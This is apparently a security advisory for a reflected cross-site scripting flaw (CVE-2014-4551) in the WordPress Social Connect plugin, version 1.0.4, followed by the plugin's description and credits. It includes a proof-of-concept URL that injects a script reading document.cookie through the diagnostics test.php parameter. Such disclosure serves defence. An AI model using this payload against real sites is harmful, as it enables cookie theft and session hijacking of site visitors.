Plugin Details
Plugin Name: wp-plugin : social-connect
Effected Version : 1.0.4 (and most probably lower version's if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : prajalkulkarni
Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :
http://127.0.0.1/wordpress/wp-content/wp-plugs/social–connect/diagnostics/test.php?testing=testing%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
Disclosure Timeline
Vendor Contacted : 2014-01-21
Plugin Status : Updated on 2014-01-11
Public Disclosure : May 25, 2014
CVE Number : CVE-2014-4551
Plugin Description :
[|
Social Connect adds social login buttons on the login, register and comment forms of your WordPress site.
The buttons offer login and registration using a Twitter, Facebook, Google, Yahoo or WordPress.com account.
It makes it super easy for new members to register with your site and existing members to login.
= Props =
Special thanks to:
* [markusdrake](http://wordpress.org/support/profile/markusdrake) for patches and helping in the support forums;
* [L D](http://wordpress.org/support/profile/enochfung) for patches and helping in the support forums;
* [Geodanny](http://wordpress.org/support/profile/geodanny) for helping in the support forums; and
* [Wirone](http://blog.wirone.info/) for polish translation and patches.
And everyone else in the forums sharing the fixes they find and answering each others questions.
= Contribute =
Social Connect is rapidly growing in popularity and help with the growing pains is appreciated.
If you're a developer, you can contribute fixes & optimisations via [Social Connect on GitHub](https://github.com/thenbrent/social-connect).
Everyone can help out by answering questions in the [Support Forums](http://wordpress.org/tags/social-connect?forum_id=10#postform).
]